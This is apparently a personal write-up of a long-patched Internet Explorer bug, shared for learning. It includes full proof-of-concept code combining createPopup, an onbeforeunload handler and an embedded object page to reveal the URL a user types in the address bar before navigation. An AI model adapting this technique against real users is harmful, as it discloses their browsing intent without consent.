This one surprised me. By combining createPopup with an onbeforeunload handler, a page could learn the exact URL the user typed in the address bar the moment they pressed Enter — before the browser even navigated there.

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>ShowMeWhatYouTypedInTheAddressBar</title>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
</head>
<body>
<script language="JavaScript">
function main()
{
	// Open an IE popup window and load pop.html into it through an HTML <object>.
	// The object ends up bound to the navigation that is already in progress.
	createPopup().document.body.innerHTML = '<object data="pop.html" type="text/html"></object>';
}
// Fires once the user has committed to leaving the page (e.g. pressed Enter in the address bar),
// but before the browser has actually navigated to the new URL.
window.onbeforeunload = function()
{
	main();
}

</script>
</body>
</html>

The supporting pop.html file simply ran:

<script>
alert(location.href);
</script>

When the user typed a new URL and pressed Enter, onbeforeunload fired. Inside that handler, a popup was created with createPopup and an HTML <object> pointing to pop.html was written into its body. Because the popup's object was loaded in the context of the navigation that was already under way, its location.href reflected exactly the URL the user had just requested rather than the page that was being unloaded. The result was a clean disclosure of browsing intent before the new page had even loaded.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.